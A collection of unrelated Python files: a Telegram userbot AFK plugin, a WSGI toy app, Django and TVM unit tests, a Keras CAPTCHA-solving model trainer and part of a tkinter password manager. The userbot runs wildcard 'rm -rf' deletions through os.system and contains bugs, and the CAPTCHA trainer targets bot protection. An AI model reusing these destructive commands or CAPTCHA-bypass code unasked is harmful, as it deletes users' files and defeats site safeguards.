PlaceHolderText = 'Multi'
Delimiter = const.DefaultDelimiter
def filter_each(self, content: str, filter_value: str,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
filter_list = filter_value.split(self.Delimiter)
return to_string(content) in filter_list
else:
return False
if __name__ == '__main__':
pass
|
py | 1a49fbadf4ba724aebb1a48d66a79b28c08a77c5 | # Copyright (C) 2020 TeamUltroid
# Ported by X_ImFine
# Recode by @mrismanaziz
# RecodeV2 by @PacarFerdilla
import asyncio
import os
from datetime import datetime
from telethon import events
from telethon.tl import functions, types
from userbot.events import register
from userbot import ( # noqa pylint: disable=unused-import isort:skip
AFKREASON,
ALIVE_NAME,
BOTLOG,
BOTLOG_CHATID,
CMD_HELP,
COUNT_MSG,
ISAFK,
PM_AUTO_BAN,
USERS,
bot,
)
global USER_AFK
global afk_time
global last_afk_message
global last_afk_msg
global afk_start
global afk_end
USER_AFK = {}
afk_time = None
last_afk_message = {}
last_afk_msg = {}
afk_start = {}
@bot.on(events.NewMessage(outgoing=True))
@bot.on(events.MessageEdited(outgoing=True))
async def set_not_afk(event):
global USER_AFK
global afk_time
global last_afk_message
global afk_start
global afk_end
back_alive = datetime.now()
afk_end = back_alive.replace(microsecond=0)
if afk_start != {}:
total_afk_time = str((afk_end - afk_start))
current_message = event.message.message
if "afk" not in current_message and "yes" in USER_AFK:
try:
if pic.endswith((".tgs", ".webp")):
shite = await bot.send_message(event.chat_id, file=pic)
shites = await bot.send_message(
event.chat_id,
f"🔥 {ALIVE_NAME} __**Sudah Kembali Online...**__\n**Sejak :** `{total_afk_time}` **Yang Lalu**",
)
else:
shite = await bot.send_message(
event.chat_id,
f"🔥 __**Sudah Kembali Online...**__\n**Ada Sejak :** `{total_afk_time}` **Yang Lalu**",
file=pic,
)
except BaseException:
shite = await bot.send_message(
event.chat_id,
f"🔥 __**Sudah Kembali Online...**__\n**Kembali Chat Sejak :** `{total_afk_time}` **Yang Lalu**",
)
except BaseException:
pass
await asyncio.sleep(6)
await shite.delete()
try:
await shites.delete()
except BaseException:
pass
USER_AFK = {}
afk_time = None
os.system("rm -rf *.webp")
os.system("rm -rf *.mp4")
os.system("rm -rf *.tgs")
os.system("rm -rf *.png")
os.system("rm -rf *.jpg")
@bot.on(events.NewMessage(incoming=True,
func=lambda e: bool(e.mentioned or e.is_private)))
async def on_afk(event):
if event.fwd_from:
return
global USER_AFK
global afk_time
global last_afk_message
global afk_start
global afk_end
back_alivee = datetime.now()
afk_end = back_alivee.replace(microsecond=0)
if afk_start != {}:
total_afk_time = str((afk_end - afk_start))
current_message_text = event.message.message.lower()
if "afk" in current_message_text:
return False
if USER_AFK and not (await event.get_sender()).bot:
msg = None
if reason:
message_to_reply = (
f"**{ALIVE_NAME} Sedang AFK**\n\n**Sejak :** `{total_afk_time}` **Yang Lalu**\n" +
f"**Karena :** `{reason}`")
else:
message_to_reply = f"**Maaf King {ALIVE_NAME} Sedang AFK**\n\n**Sejak :** `{total_afk_time}` **Yang Lalu**"
try:
if pic.endswith((".tgs", ".webp")):
msg = await event.reply(file=pic)
msgs = await event.reply(message_to_reply)
else:
msg = await event.reply(message_to_reply, file=pic)
except BaseException:
msg = await event.reply(message_to_reply)
await asyncio.sleep(2.5)
if event.chat_id in last_afk_message:
await last_afk_message[event.chat_id].delete()
try:
if event.chat_id in last_afk_msg:
await last_afk_msg[event.chat_id].delete()
except BaseException:
pass
last_afk_message[event.chat_id] = msg
try:
if msgs:
last_afk_msg[event.chat_id] = msgs
except BaseException:
pass
@register(
outgoing=True, pattern=r"^\.afk(?: |$)(.*)", disable_errors=True
) # pylint:disable=E0602
async def _(event):
if event.fwd_from:
return
reply = await event.get_reply_message()
global USER_AFK
global afk_time
global last_afk_message
global last_afk_msg
global afk_start
global afk_end
global reason
global pic
USER_AFK = {}
afk_time = None
last_afk_message = {}
last_afk_msg = {}
afk_end = {}
start_1 = datetime.now()
afk_start = start_1.replace(microsecond=0)
reason = event.pattern_match.group(1)
if reply:
pic = await event.client.download_media(reply)
else:
pic = None
if not USER_AFK:
last_seen_status = await bot(
functions.account.GetPrivacyRequest(types.InputPrivacyKeyStatusTimestamp())
)
if isinstance(last_seen_status.rules, types.PrivacyValueAllowAll):
afk_time = datetime.datetime.now()
USER_AFK = f"yes : {reason} {pic}"
if reason:
try:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(event.chat_id, file=pic)
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
file=pic,
)
except BaseException:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
try:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(event.chat_id, file=pic)
await bot.send_message(
event.chat_id, f"**King {ALIVE_NAME} Telah AFK...**"
)
else:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK...**",
file=pic,
)
except BaseException:
await bot.send_message(
event.chat_id, f"**King {ALIVE_NAME} Telah AFK...**"
)
await event.delete()
try:
if reason and pic:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(BOTLOG_CHATID, file=pic)
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**\n**Karena :** `{reason}`",
file=pic,
)
elif reason:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**\n**Karena :** `{reason}`",
)
elif pic:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(BOTLOG_CHATID, file=pic)
await bot.send_message(
BOTLOG_CHATID, f"#AFK\n**{ALIVE_NAME} Telah AFK**"
)
else:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**",
file=pic,
)
else:
await bot.send_message(
BOTLOG_CHATID, f"#AFK\n**{ALIVE_NAME} Masih aja AFK**"
)
except Exception as e:
BOTLOG_CHATIDger.warn(str(e))
CMD_HELP.update(
{
"afk": "**✘ Plugin : **`afk`\
\n\n • **Perintah :** `.afk` <alasan> bisa <sambil reply sticker/foto/gif/media>\
\n • **Function : **Memberi tahu kalau King sedang afk bisa dengan menampilkan media keren ketika seseorang menandai atau membalas salah satu pesan atau dm Anda\
\n\n • **Notes :** __Bila ada orang spam berlebihan ke Anda , tinggal ketik__ `.block`\
"
}
)
|
py | 1a49fbb66254751629fed826f5c6e77a28dacc0c | # python server.py no4_2_app:app
from no4_1_framework import MyWSGIFramework
def get(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
return [b"Hello, world by framework."]
def hoge(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
return [b"hoge by framework"]
app = MyWSGIFramework([
('/', get),
('/hoge', hoge),
]) |
py | 1a49fbc642c4551e2a32872cf8e121dcb36fa5b6 | from django.test import TestCase
from django_ses.views import (emails_parse, stats_to_list, quota_parse,
sum_stats)
# Mock of what boto's SESConnection.get_send_statistics() returns
STATS_DICT = {
u'SendDataPoints': [
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'11',
u'Rejects': u'0',
u'Timestamp': u'2011-02-28T13:50:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'8',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T16:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'33',
u'Rejects': u'0',
u'Timestamp': u'2011-02-25T20:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'3',
u'Timestamp': u'2011-02-28T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'2',
u'Rejects': u'3',
u'Timestamp': u'2011-02-25T22:50:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'6',
u'Rejects': u'0',
u'Timestamp': u'2011-03-01T13:20:00Z',
},
],
}
QUOTA_DICT = {
u'GetSendQuotaResponse': {
u'GetSendQuotaResult': {
u'Max24HourSend': u'10000.0',
u'MaxSendRate': u'5.0',
u'SentLast24Hours': u'1677.0'
},
u'ResponseMetadata': {
u'RequestId': u'8f100233-44e7-11e0-a926-a198963635d8'
}
}
}
VERIFIED_EMAIL_DICT = {
u'ListVerifiedEmailAddressesResponse': {
u'ListVerifiedEmailAddressesResult': {
u'VerifiedEmailAddresses': [
u'[email protected]',
u'[email protected]',
u'[email protected]'
]
},
u'ResponseMetadata': {
u'RequestId': u'9afe9c18-44ed-11e0-802a-25a1a14c5a6e'
}
}
}
class StatParsingTest(TestCase):
def setUp(self):
self.stats_dict = STATS_DICT
self.quota_dict = QUOTA_DICT
self.emails_dict = VERIFIED_EMAIL_DICT
def test_stat_to_list(self):
expected_list = [
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'8',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T16:35:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'33',
u'Rejects': u'0',
u'Timestamp': u'2011-02-25T20:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'2',
u'Rejects': u'3',
u'Timestamp': u'2011-02-25T22:50:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'11',
u'Rejects': u'0',
u'Timestamp': u'2011-02-28T13:50:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'3',
u'Timestamp': u'2011-02-28T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'6',
u'Rejects': u'0',
u'Timestamp': u'2011-03-01T13:20:00Z',
},
]
actual = stats_to_list(self.stats_dict, localize=False)
self.assertEqual(len(actual), len(expected_list))
self.assertEqual(actual, expected_list)
def test_quota_parse(self):
expected = {
u'Max24HourSend': u'10000.0',
u'MaxSendRate': u'5.0',
u'SentLast24Hours': u'1677.0',
}
actual = quota_parse(self.quota_dict)
self.assertEqual(actual, expected)
def test_emails_parse(self):
expected_list = [
u'[email protected]',
u'[email protected]',
u'[email protected]',
]
actual = emails_parse(self.emails_dict)
self.assertEqual(len(actual), len(expected_list))
self.assertEqual(actual, expected_list)
def test_sum_stats(self):
expected = {
'Bounces': 2,
'Complaints': 4,
'DeliveryAttempts': 66,
'Rejects': 6,
}
stats = stats_to_list(self.stats_dict)
actual = sum_stats(stats)
self.assertEqual(actual, expected)
|
py | 1a49fc5a01846deca06ecd4647465399796a85f2 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, missing-docstring, no-else-return
"""Unit tests for the Relay VM serialization and deserialization."""
import pytest
import numpy as np
import tvm
from tvm.runtime import vm as _vm
from tvm.relay import vm as rly_vm
from tvm import relay
from tvm.relay.scope_builder import ScopeBuilder
from tvm.relay import transform
from tvm.relay.prelude import Prelude
from tvm.contrib import utils
from tvm.relay import testing
def create_exec(f, target="llvm", params=None):
if isinstance(f, relay.Expr):
mod = tvm.IRModule()
mod["main"] = f
executable = rly_vm.compile(mod, target=target, params=params)
return executable
else:
assert isinstance(f, tvm.IRModule), "expected mod as tvm.IRModule"
executable = rly_vm.compile(f, target=target, params=params)
return executable
def get_serialized_output(mod, *data, params=None, target="llvm", device=tvm.cpu()):
exe = create_exec(mod, target, params=params)
code, lib = exe.save()
des_exec = _vm.Executable.load_exec(code, lib)
des_vm = _vm.VirtualMachine(des_exec, device)
result = des_vm.run(*data)
return result
def run_network(mod, params, dtype="float32"):
def get_vm_output(mod, data, params, target, device, dtype="float32"):
result = relay.create_executor("vm", mod=mod, device=device).evaluate()(data, **params)
return result.numpy().astype(dtype)
data_shape = [int(x) for x in mod["main"].checked_type.arg_types[0].shape]
data = np.random.uniform(size=data_shape).astype(dtype)
target = "llvm"
dev = tvm.cpu(0)
tvm_out = get_vm_output(mod, tvm.nd.array(data.astype(dtype)), params, target, dev, dtype)
vm_out = get_serialized_output(
mod, tvm.nd.array(data.astype(dtype)), params=params, target=target, device=dev
)
tvm.testing.assert_allclose(vm_out.numpy().astype(dtype), tvm_out, rtol=1e-5, atol=1e-5)
def test_serializer():
mod = tvm.IRModule({})
a = relay.const(1.0, "float32")
x = relay.var("x", shape=(10, 10), dtype="float32")
f1 = relay.Function([x], x + a)
glb_f1 = relay.GlobalVar("f1")
mod[glb_f1] = f1
# TODO(@jroesch): look into optimizing away the need to do this
mod = transform.InferType()(mod)
b = relay.const(2.0, "float32")
y = relay.var("y", shape=(10, 10), dtype="float32")
f2 = relay.Function([y], y - b)
glb_f2 = relay.GlobalVar("f2")
mod[glb_f2] = f2
# TODO(@jroesch): look into optimizing away the need to do this
mod = transform.InferType()(mod)
x1 = relay.var("x1", shape=(10, 10), dtype="float32")
y1 = relay.var("y1", shape=(10, 10), dtype="float32")
main = relay.Function([x1, y1], glb_f1(x1) * glb_f2(y1))
mod["main"] = main
exe = create_exec(mod)
glbs = exe.globals
assert len(glbs) == 3
assert "f1" in glbs
assert "f2" in glbs
assert "main" in glbs
prim_ops = exe.primitive_ops
assert any(item.startswith("vm_mod_fused_add") for item in prim_ops)
assert any(item.startswith("vm_mod_fused_subtract") for item in prim_ops)
assert any(item.startswith("vm_mod_fused_multiply") for item in prim_ops)
code = exe.bytecode
assert "main(x1, y1)" in code
assert "f1(x)" in code
assert "f2(y)" in code
code, lib = exe.save()
assert isinstance(code, bytearray)
assert isinstance(lib, tvm.runtime.Module)
def test_save_load():
x = relay.var("x", shape=(10, 10))
f = relay.Function([x], x + x)
x_data = np.random.rand(10, 10).astype("float32")
# serialize.
vm = create_exec(f)
code, lib = vm.save()
assert isinstance(code, bytearray)
# save and load the code and lib file.
tmp = utils.tempdir()
path_lib = tmp.relpath("lib.so")
lib.export_library(path_lib)
with open(tmp.relpath("code.ro"), "wb") as fo:
fo.write(code)
loaded_lib = tvm.runtime.load_module(path_lib)
loaded_code = bytearray(open(tmp.relpath("code.ro"), "rb").read())
# deserialize.
des_exec = _vm.Executable.load_exec(loaded_code, loaded_lib)
des_vm = _vm.VirtualMachine(des_exec, tvm.cpu())
res = des_vm.run(x_data)
tvm.testing.assert_allclose(res.numpy(), x_data + x_data)
def test_const():
c = relay.const(1.0, "float32")
x = relay.var("x", shape=(10, 10), dtype="float32")
f = relay.Function([x], x + c)
x_data = np.random.rand(10, 10).astype("float32")
res = get_serialized_output(f, x_data)
tvm.testing.assert_allclose(res.numpy(), x_data + 1)
def test_if():
x = relay.var("x", shape=(10, 10))
y = relay.var("y", shape=(10, 10))
equal = relay.op.equal(x, y)
equal = relay.op.nn.batch_flatten(equal)
f = relay.Function([x, y], relay.If(relay.op.min(equal, axis=[0, 1]), x, y))
x_data = np.random.rand(10, 10).astype("float32")
y_data = np.random.rand(10, 10).astype("float32")
# same
res = get_serialized_output(f, x_data, x_data)
tvm.testing.assert_allclose(res.numpy(), x_data)
# diff
res = get_serialized_output(f, x_data, y_data)
tvm.testing.assert_allclose(res.numpy(), y_data)
def test_loop():
mod = tvm.IRModule({})
sum_up = relay.GlobalVar("sum_up")
i = relay.var("i", shape=[], dtype="int32")
accum = relay.var("accum", shape=[], dtype="int32")
sb = ScopeBuilder()
with sb.if_scope(relay.equal(i, relay.const(0, "int32"))):
sb.ret(accum)
with sb.else_scope():
one_less = relay.subtract(i, relay.const(1, "int32"))
new_accum = relay.add(accum, i)
sb.ret(relay.Call(sum_up, [one_less, new_accum]))
func = relay.Function([i, accum], sb.get())
mod[sum_up] = func
mod = transform.InferType()(mod)
loop_bound = 0
i_data = np.array(loop_bound, dtype="int32")
accum_data = np.array(0, dtype="int32")
iarg = relay.var("i", shape=[], dtype="int32")
aarg = relay.var("accum", shape=[], dtype="int32")
mod["main"] = relay.Function([iarg, aarg], sum_up(iarg, aarg))
result = get_serialized_output(mod, i_data, accum_data)
tvm.testing.assert_allclose(result.numpy(), sum(range(1, loop_bound + 1)))
def test_tuple():
ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
tup = relay.var("tup", type_annotation=ttype)
f = relay.Function([tup], relay.TupleGetItem(tup, 1))
i_data = np.random.rand(41).astype("float32")
j_data = np.random.rand(10).astype("float32")
result = get_serialized_output(f, (i_data, j_data))
tvm.testing.assert_allclose(result.numpy(), j_data)
def test_adt_list():
mod = tvm.IRModule()
p = Prelude(mod)
_, cons, nil = mod.get_type("List")
l1 = cons(relay.const(1), nil())
l21 = cons(relay.const(2), l1)
l321 = cons(relay.const(3), l21)
f = relay.Function([], l321)
mod["main"] = f
result = get_serialized_output(mod)
assert len(result) == 2
assert len(result[1]) == 2
assert len(result[1][1]) == 2
res = []
res.append(result[0].numpy().tolist())
res.append(result[1][0].numpy().tolist())
res.append(result[1][1][0].numpy().tolist())
tvm.testing.assert_allclose(res, np.array([3, 2, 1]))
def test_adt_compose():
mod = tvm.IRModule()
p = Prelude(mod)
compose = mod.get_global_var("compose")
# add_one = fun x -> x + 1
sb = relay.ScopeBuilder()
x = relay.var("x", "float32")
x1 = sb.let("x1", x)
xplusone = x1 + relay.const(1.0, "float32")
sb.ret(xplusone)
body = sb.get()
add_one = relay.GlobalVar("add_one")
add_one_func = relay.Function([x], body)
# add_two = compose(add_one, add_one)
sb = relay.ScopeBuilder()
y = relay.var("y", "float32")
add_two_func = sb.let("add_two", compose(add_one_func, add_one_func))
add_two_res = add_two_func(y)
sb.ret(add_two_res)
add_two_body = sb.get()
mod[add_one] = add_one_func
f = relay.Function([y], add_two_body)
mod["main"] = f
x_data = np.array(np.random.rand()).astype("float32")
result = get_serialized_output(mod, x_data)
tvm.testing.assert_allclose(result.numpy(), x_data + 2.0)
def test_closure():
x = relay.var("x", shape=())
y = relay.var("y", shape=())
f = relay.Function([x], x + y)
ff = relay.Function([y], f)
clo = ff(relay.const(1.0))
main = clo(relay.const(2.0))
res = get_serialized_output(main)
tvm.testing.assert_allclose(res.numpy(), 3.0)
def test_synthetic():
mod, params = testing.synthetic.get_workload()
run_network(mod, params)
def test_mobilenet():
mod, params = testing.mobilenet.get_workload(batch_size=1)
run_network(mod, params)
def test_vm_shape_of():
x = relay.var("x", shape=(relay.Any(), relay.Any(), relay.Any()), dtype="float32")
relu_x = relay.nn.relu(x)
data = np.random.uniform(size=(2, 3, 4)).astype("float32")
args = [data]
newshape_var = relay.var("newshape", shape=(2,), dtype="int64")
args.append(np.array((1, -1), dtype="int64"))
main = relay.Function([x, newshape_var], relay.reshape(relu_x, newshape=newshape_var))
res = get_serialized_output(main, *args).numpy()
tvm.testing.assert_allclose(res.flatten(), data.flatten())
def test_dynamic_bcast():
dtype = "float32"
x = relay.var("x", shape=(relay.Any(), 2), dtype=dtype)
y = relay.var("y", shape=(3, 2), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x, y], relay.add(x, y))
x_data = np.random.uniform(size=(1, 2)).astype(dtype)
y_data = np.random.uniform(size=(3, 2)).astype(dtype)
res_np = np.add(x_data, y_data)
for target, dev in testing.enabled_targets():
res = get_serialized_output(mod, *(x_data, y_data), target=target, device=dev)
tvm.testing.assert_allclose(res.numpy(), res_np)
if __name__ == "__main__":
pytest.main([__file__])
|
py | 1a49fd149c4b9c0f99bc8c421bd17db08048249f | from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.response import Response
from rest_framework.test import APIClient
from core.models import User as UserModel
CREATE_USER_URL = reverse('user:create')
ME_URL = reverse('user:me')
CREATE_TOKEN_URL = reverse('user:token')
User: UserModel = get_user_model()
def create_user(**param) -> User:
return User.objects.create_user(**param)
class PublicUserApiTests(TestCase):
def setUp(self) -> None:
self.client = APIClient()
def test_create_valid_user_success(self):
payload = {
'email': '[email protected]',
'password': 'longpass123',
'name': 'Test Name'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = User.objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
payload = {
'email': '[email protected]',
'password': '[email protected]'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
payload = {
'email': '[email protected]',
'password': 'pw',
'name': 'Test'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
exists = User.objects.filter(email=payload['email']).exists()
self.assertFalse(exists)
def test_create_token_for_user(self):
payload = {
'email': '[email protected]',
'password': '[email protected]'
}
create_user(**payload)
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
create_user(email="[email protected]", password="mypass")
payload = {
'email': '[email protected]',
'password': 'wrong pass'
}
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
payload = {
'email': '[email protected]',
'password': 'mypassword'
}
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
res: Response = self.client.post(
CREATE_TOKEN_URL,
{'email': 'one', 'password': ''}
)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
res: Response = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
def setUp(self) -> None:
self.user = create_user(
email="[email protected]",
password="password",
name="testuser",
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_user(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
payload = {
'email': '[email protected]',
'password': 'newwpassword',
'name': 'newname'
}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertEqual(self.user.email, payload['email'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
|
py | 1a49fd9c8df98ddbc4403be55f9bc5b13c8149f8 | # Generated by Django 2.0.1 on 2018-03-21 16:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('materials', '0024_auto_20180321_1512'),
]
operations = [
migrations.AlterField(
model_name='idinfo',
name='data_extraction_method',
field=models.CharField(max_length=500),
),
migrations.AlterField(
model_name='idinfo',
name='source',
field=models.CharField(max_length=500),
),
]
|
py | 1a49fdbebb6a4177f6b84f68acc2ccaedf7a2805 | import cv2
import pickle
import os.path
import numpy as np
from imutils import paths
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers.core import Flatten, Dense
#from helpers import resize_to_fit
LETTER_IMAGES_FOLDER = "extracted_letter_images"
MODEL_FILENAME = "captcha_model.hdf5"
MODEL_LABELS_FILENAME = "model_labels.dat"
# initialize the data and labels
data = []
labels = []
# loop over the input images
for image_file in paths.list_images(LETTER_IMAGES_FOLDER):
# Load the image and convert it to grayscale
image = cv2.imread(image_file)
#image = cv2.threshold(image, 195, 255, cv2.THRESH_BINARY)[1]
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.threshold(image, 195, 255, cv2.THRESH_BINARY)[1]
#cv2.imshow('ImageWindow', image)
#cv2.waitKey()
# Add a third channel dimension to the image to make Keras happy
image = list(np.expand_dims(image, axis=2))
print(np.array(image).shape)
# Grab the name of the letter based on the folder it was in
label = image_file.split(os.path.sep)[-1][0]
# Add the letter image and it's label to our training data
data.append(image)
labels.append(label)
#print('data', data)
#print('labels', labels)
# scale the raw pixel intensities to the range [0, 1] (this improves training)
data = np.array(data, dtype="float") / 255
labels = np.array(labels)
# Split the training data into separate train and test sets
(X_train, X_test, Y_train, Y_test) = train_test_split(data, labels, test_size=0.25, random_state=0)
# Convert the labels (letters) into one-hot encodings that Keras can work with
lb = LabelBinarizer().fit(Y_train)
Y_train = lb.transform(Y_train)
Y_test = lb.transform(Y_test)
# Save the mapping from labels to one-hot encodings.
# We'll need this later when we use the model to decode what it's predictions mean
with open(MODEL_LABELS_FILENAME, "wb") as f:
pickle.dump(lb, f)
# Build the neural network!
model = Sequential()
# First convolutional layer with max pooling
model.add(Conv2D(20, (5, 5), padding="same", input_shape=(60, 40, 1), activation="relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# Second convolutional layer with max pooling
model.add(Conv2D(50, (5, 5), padding="same", activation="relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# Hidden layer with 500 nodes
model.add(Flatten())
model.add(Dense(500, activation="relu"))
# Output layer with 32 nodes (one for each possible letter/number we predict)
model.add(Dense(28, activation="softmax"))
# Ask Keras to build the TensorFlow model behind the scenes
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
#print(X_train)
print(np.array(X_train).shape)
print(np.array(Y_train).shape)
# Train the neural network
model.fit(np.array(X_train), np.array(Y_train), validation_data=(X_test, Y_test), batch_size=3, epochs=10, verbose=1)
# Save the trained model to disk
model.save(MODEL_FILENAME)
|
py | 1a49fdf71595ced30cdb991b300a6613a3292390 | from tkinter import *
from tkinter import messagebox
from scripts import data_manager
from scripts import password_generator
import pyperclip
BACKGROUND_COLOUR = '#495664'
FOREGROUND_COLOUR = '#f6f7d3'
DARK_TEXT_COLOUR = '#333c4a'
class UI:
def __init__(self):
# Init objects
self.data_manager_obj = data_manager.DataManager()
# Setup files if first start
if self.data_manager_obj.is_first_start():
self.data_manager_obj.setup_obj.run_setup()
# Create login window if not first start
if not self.data_manager_obj.is_first_start():
self.login_window = Tk()
self.login_window.title('Login to Password Manager')
self.login_window.config(padx=60, pady=50, bg=BACKGROUND_COLOUR)
# Master user credentials
self.master_username = StringVar()
self.master_password = StringVar()
# Init other variables required
self.main_window = None
self.main_image = None
self.symbols_checked = None
self.letters_checked = None
self.numbers_checked = None
self.spinbox_pass_length = None
self.add_new_tag = None
self.add_new_username = None
self.add_new_pass = None
self.select_tag = None
self.tags_option_menu = None
self.user_listbox = None
self.pass_listbox = None
# Init login window objects
self.init_login_window()
self.login_window.mainloop()
def init_login_window(self):
user_label = Label(text='Username: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
user_label.grid(row=0, column=0)
user_entry = Entry(width=30, textvariable=self.master_username)
user_entry.grid(row=0, column=1)
pass_label = Label(text='Password: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
pass_label.grid(row=1, column=0)
pass_entry = Entry(width=30, textvariable=self.master_password, show='*')
pass_entry.grid(row=1, column=1)
go_btn = Button(text='Go', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, command=self.login_pressed, pady=10)
go_btn.grid(row=2, column=2)
user_entry.focus()
def login_pressed(self):
username = self.master_username.get()
password = self.master_password.get()
if username and password:
self.master_username.set('')
self.master_password.set('')
check_username, check_password = self.data_manager_obj.get_master_details()
if str(check_username) == str(username):
if str(check_password) == str(password):
self.create_main_window()
else:
messagebox.showerror(title='Incorrect', message='Please check the password.')
else:
messagebox.showerror(title='Incorrect', message='Please check the username.')
else:
messagebox.showerror(title='Empty field(s)?', message='Please don\'t leave any field(s) empty.')
def create_main_window(self):
self.login_window.destroy()
self.main_window = Tk()
self.main_window.title('Password Manager')
self.main_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
main_canvas = Canvas(width=600, height=600)
main_canvas.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
self.main_image = PhotoImage(file='images/password-manager.png')
main_canvas.create_image(300, 300, image=self.main_image)
main_canvas.grid(row=0, column=1)
tags_label = Label(text='TAG:', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=50)
tags_label.grid(row=1, column=0)
self.select_tag = StringVar()
tags_list = self.data_manager_obj.get_saved_password_tags()
self.tags_option_menu = OptionMenu(self.main_window, self.select_tag, *tags_list)
self.select_tag.set(tags_list[0])
